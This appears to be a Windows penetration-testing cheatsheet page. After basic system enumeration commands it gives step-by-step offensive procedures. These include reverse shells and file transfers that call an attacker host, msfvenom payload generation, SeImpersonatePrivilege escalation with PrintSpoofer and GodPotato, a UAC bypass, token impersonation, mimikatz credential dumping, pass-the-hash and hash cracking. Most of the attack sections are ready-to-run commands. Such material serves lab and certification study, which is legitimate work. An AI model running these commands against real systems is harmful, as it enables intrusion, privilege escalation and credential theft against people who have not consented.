Cheatsheet

Topics

Introduction to the Windows Shells
Windows Permissions
Reverse Shells in Windows
SeImpersonatePrivilege Exploitation
On Cross Compilation
Windows Services
Weak Service Permissions
Unquoted Service Path
DLL Hijacking
Always Install Elevated
Files with Sensitive Data
Windows Hashes
Stored Credentials and the Windows Vault
Scheduled Task
Critical Registry Paths
Useful Tools
AMSI Bypass

Win Enumeration

System Information Commands

Operating System and Version:

systeminfo      # Displays detailed system information
ver             # Displays Windows version
winver          # Displays Windows version and build number
msinfo32        # Opens System Information tool.
wmic os get name,version,buildnumber # Retrieves OS version/build info

Hardware Information:

getmac /v       # Displays MAC address  
hostname        # Displays computer name

Environment Variables:

set             # Lists all environment variables  
echo %PATH%     # Prints a specific environment variable
path            # Displays or modifies the PATH environment variable

File System and Directory Management

Navigation and Directory Structure:

cd               # Change current directory  
dir              # List files and directories  
tree             # Graphical view of directory structure

File Operations:

type NUL > file.txt     # Create a new file  
echo "text" > file.txt  # Write text into a file  
type file.txt           # Display file contents  
del file.txt            # Delete a file  
copy file1 file2        # Copy files  
move file1 folder/      # Move files  
ren oldname new_name     # Rename files

Directory Operations:

mkdir new_folder          # Create a directory  
rd folder_name            # Remove a directory

3. Networking Commands

Network Information:

ipconfig /all            # Displays all network interfaces  
netstat -ano             # Shows network connections and listening ports  
route print              # Displays the routing table  
netsh wlan show profiles # Shows Wi-Fi profiles

Testing and Troubleshooting:

ping google.com          # Test connectivity  
tracert microsoft.com    # Trace route to a destination  
nslookup google.com      # DNS queries

Permissions and User Management

User Information:

whoami                   # Displays current user  
whoami /groups           # Lists user groups  
whoami /priv             # Shows user privileges
net user                 # Lists all users  
net user <USERNAME>      # Displays user details  
net localgroup Administrators #Manages local groups

Permissions and Policies:

icacls file.txt          # Displays file permissions  
net accounts             # Displays account policies  
gpupdate /force          # Updates Group Policy settings  
gpresult /r              # Displays Group Policy results

Process and Service Management

Process Management:

tasklist                 # Lists running processes  
taskkill /IM process.exe /F   # Terminates processes

Service Management:

net start "ServiceName"        # Starts a service
sc.exe start <SERVICE>         # Starts a service
net stop "ServiceName"         # Stops a service
sc.exe stop <SERVICE>          # Stops a service
sc query                       # Queries Windows services
sc.exe qc <SERVICE>            # Checks Service Configuration
Get-Service                    # PowerShell alternative for service details
sc.exe config <SERVICE> binPath="C:\Path\to\malicious.exe" #Changes the Binary Path of a Service
sc.exe sdshow <SERVICE>        # Checks Service Permissions
sc.exe sdset <SERVICE> <SDDL>  # Updates Service Permissions
.\accesschk64.exe /accepteula -uwcqv SimpleService  # Verify Service Permissions
ConvertFrom-SddlString -Sddl <SDDL> #Convert SDDL to Readable Format
wmic process list full | Select-String 'executablepath=C:' | Select-String -NotMatch 'system32|syswow' #Get Executable Path for All Processes
x86_64-w64-mingw32-gcc -mwindows -municode -O2 -s -o simpleService.exe simpleService.c #Compiling a Custom Service

Windows System Utilities

Administrative Tools:

mmc                     # Opens Microsoft Management Console  
eventvwr                # Opens Event Viewer  
services.msc            # Opens Services Management Console

Performance and Disk Management:

perfmon                 # Opens Performance Monitor  
resmon                  # Opens Resource Monitor  
diskmgmt.msc            # Opens Disk Management  
cleanmgr                # Opens Disk Cleanup  
defrag C:               # Defragments the drive

PowerShell - System, User, Process and Service

PowerShell Commands for Local Accounts:

Get-LocalUser           # Lists local users  
Get-LocalGroup          # Lists local groups  
Get-LocalGroupMember <GROUP_NAME>  # Lists members of a group

System File Management:

sfc /scannow            # Scans and repairs system files  
chkdsk C: /f            # Checks and fixes disk errors

Registry and Configuration Management:

reg query HKLM\Software         # Queries the registry  
msconfig                        # Opens System Configuration

List Environment Variables
```
dir env:
```

Search Files Recursively

Get-ChildItem -Path C:\Users\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\ -Include *.txt -File -Recurse -ErrorAction SilentlyContinue

List Running Processes
```
Get-Process
```

List Installed Applications (32-bit)

Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName

List Installed Applications (64-bit)

Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName

Retrieve Service Information

Get-Service * | Select-Object DisplayName,Status,ServiceName,Can*
Get-CimInstance -ClassName Win32_Service | Select-Object Name,State,PathName | Where-Object {$_.State -like 'Running'}

File Transfer and Reverse Shell

Generate a reverse shell payload

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe

Using certutil Certutil is a Windows tool that can download files:

certutil -urlcache -split -f http://attacker_ip/file.exe file.exe

Using PowerShell PowerShell (iwr) can download files via HTTP:

Invoke-WebRequest -Uri http://attacker_ip/file.exe -OutFile file.exe

Using FTP Windows supports FTP commands:

ftp
open <attacker_ip>
put file.txt
get file.txt

Using SMB Shares Files can be transferred using network shares:

net use \\<attacker_ip>\share /user:username password
copy file.exe \\<attacker_ip>\share

Netcat Set up a listener on the attacker machine:

nc -lvp 4444 > file.exe

Send the file from the target:

nc attacker_ip 4444 < file.exe

Python Simple HTTP Server On the attacker machine:

python3 -m http.server 80

On the target machine:

certutil -urlcache -split -f http://attacker_ip/file.exe file.exe

Spawning a Reverse Shell

cmd.exe

The cmd.exe reverse shell relies on utilities like ncat.exe to establish a connection. The process involves downloading the necessary binary, setting up a listener on the attacker machine, and initiating the reverse connection from the victim machine.

Steps

Download ncat.exe on the Target Machine ncat.exe (a lightweight implementation of Netcat) is required for creating the reverse shell.
```
iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -OutFile nc64.exe
```
Set Up a Listener on the Attacker Machine The attacker machine must have a listener ready to receive the reverse connection.
```
nc -lvnp 7777
```
Initiate the Reverse Shell from the Target Machine On the victim machine, execute the following command to connect back to the attacker and spawn a shell:
```
C:\Users\Quickemu\Desktop\nc64.exe 192.168.122.1 7777 -e cmd
```

Powershell

Using Invoke-PowerShellTcp.ps1 Script

Invoke-PowerShellTcp.ps1 is a PowerShell script designed for reverse shells.

Download the Script on the Attacker Machine

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Configure the Script Add the line to specify the attacker's IP and port:

echo "Invoke-PowerShellTcp -Reverse -IPAddress <Attacker_Machine> -Port 7777" >> Invoke-PowerShellTcp.ps1

Host the Script on an HTTP Server Use Python to serve the script for download:
```
python3 -m http.server 1337
```
Start listening mode with Netcat on attacker machine
```
netcat -nvlp 7777
```

Execute the Script from the Target Machine

From CMD:

powershell -c "iex(new-object net.webclient).downloadstring(\"http://192.168.122.1:1337/Invoke-PowerShellTcp.ps1\")"

From PowerShell:

iex(new-object net.webclient).downloadstring("http://<Attacker_Machine>:1337/Invoke-PowerShellTcp.ps1")

Win Priv Esc

SeImpersonatePrivilege

Checking for SeImpersonatePrivilege

To verify whether the current user has this privilege, run the following:

whoami /priv

Sample Output

PRIVILEGES INFORMATION
----------------------
Privilege Name                Description                               State
============================= ========================================= ========
SeImpersonatePrivilege        Impersonate a client after authentication Enabled

If the SeImpersonatePrivilege is enabled, the user can exploit it for privilege escalation using tools like PrintSpoofer or GodPotato.

SeImpersonatePrivilege Privilege Escalation

Initial Setup

Start a Listener on the Attacker Machine
```
nc -lvnp 5555
```

Download Netcat on the Victim Machine

iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe

PrintSpoofer

PrintSpoofer leverages misconfigured print spooler services to escalate privileges to SYSTEM.

Download the Exploit

iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe

Execute the Exploit Run the following command to establish a SYSTEM shell:

PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"

GodPotato

Identify .NET Framework Version Use the following command to determine the .NET version installed:
```
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
```

Download the Appropriate GodPotato Version Depending on the .NET version:

.NET 2.0:

iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe

.NET 3.5:

iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe

.NET 4.0:

iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe

Execute the Exploit Use the appropriate executable to escalate privileges and spawn a reverse shell:
```
.\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
```

winPEAS

Download the binary:

wget https://github.com/peass-ng/PEASS-ng/releases/download/20241011-2e37ba11/winPEASx64.exe

Running winPEAS to Enumerate Services
Use the servicesinfo option to gather information about services:

.\winPEASx64.exe quiet servicesinfo

Kernel

# WIN KERNEL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe -o payload.exe

python3 -m http.server
# Download payload.exe on target

## Windows-Exploit-Suggester Install
mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script

cd Windows-Exploit-Suggester
python ./windows-exploit-suggester.py --update
pip install xlrd --upgrade

./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win7sp1-systeminfo.txt

./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win2008r2-systeminfo.txt

## METASPLOIT
## Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>

use exploit/multi/handler 
options
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>

use post/multi/recon/local_exploit_suggester
set SESSION <HANDLER_SESSION_NUMBER>

## MsfConsole Meterpreter Privesc
getprivs
getsystem

# Exploitable vulnerabilities modules
exploit/windows/local/bypassuac_dotnet_profiler
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_sdclt
exploit/windows/local/cve_2019_1458_wizardopium
exploit/windows/local/cve_2020_1054_drawiconex_lpe
exploit/windows/local/ms10_092_schelevator
exploit/windows/local/ms14_058_track_popup_menu
exploit/windows/local/ms15_051_client_copy_image
exploit/windows/local/ms16_014_wmi_recv_notif

UAC

# UAC - UACME

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe > backdoor.exe

## METASPLOIT - Listening
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>

## Meterpreter (Unprivileged session)
cd C:\\
mkdir Temp
cd Temp
upload /root/backdoor.exe
upload /root/Desktop/tools/UACME/Akagi64.exe
shell
Akagi64.exe 23 C:\Temp\backdoor.exe

akagi32.exe [Key] [Param]
akagi64.exe [Key] [Param]

## Elevated Meterpreter Received on the listening session
ps -S lsass.exe
migrate <lsass_PID>
hashdump

Access Token

# ACCESS TOKEN IMPERSONATION

## METASPLOIT - Meterpreter (Unprivileged session)
pgrep explorer
migrate <explorer_PID>
getuid
getprivs

load incognito
list_tokens -u
impersonate_token "ATTACKDEFENSE\Administrator"
getuid
getprivs # Access Denied
pgrep explorer
migrate <explorer_PID>
getprivs
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

Windows Credential Dumping

# Exploitation
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<TARGET_IP> LPORT=1234 -f exe > payload.exe

python -m SimpleHTTPServer 80

#Grant Privilege to a User:
Add-LocalGroupMember -Group "Backup Operators" -Member "Leonardo"
#Save SAM and SYSTEM Files:
reg save hklm\sam C:\Users\Leonardo\Desktop\SAM.hive
reg save hklm\system C:\Users\Leonardo\Desktop\SYSTEM.hive


## METASPLOIT
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>

use exploit/multi/handler 
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
run

## On target system
certutil -urlcache -f http://<TARGET_IP>/payload.exe payload.exe
# Run payload.exe

# METASPLOIT - Meterpreter
sysinfo
getuid
pgrep lsass
migrate <explorer_PID>
getprivs

# Creds dumping - Meterpreter
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets

# MIMIKATZ
cd C:\\
mkdir Temp
cd Temp
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell

mimikatz.exe
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonPasswords
mimikatz64.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

# PASS THE HASH
## sekurlsa::logonPasswords
background
search psexec
use exploit/windows/smb/psexec
set LPORT <LOCAL_PORT2>
set SMBUser Administrator
set SMBPass <ADMINISTRATOR_LM:NTLM_HASH>
exploit

System Logs

Get-History    # Retrieve Commands from Memory
(Get-PSReadlineOption).HistorySavePath    # Retrieve History File Location

Cracking Windows Hashes

#Download rockyou.txt:
curl -L https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz | tar -xz

#LM Hash:
john --format=lm --wordlist=rockyou.txt hash.txt
hashcat -m 3000 -a 3 hash.txt

#NTLM Hash:
john --format=nt --wordlist=rockyou.txt hash.txt
hashcat -m 1000 -a 3 hash.txt

#Net-NTLMv1:
john --format=netntlm --wordlist=rockyou.txt hash.txt
hashcat -m 5500 -a 3 hash.txt

#Net-NTLMv2:
john --format=netntlmv2 --wordlist=rockyou.txt hash.txt
hashcat -m 5600 -a 3 hash.txt

Crackmapexec

crackmapexec smb <TARGET_IP> -u Administrator -H "<NTLM_HASH>" -x "whoami"

Previous17 - AMSI Bypass

Last updated 5 months ago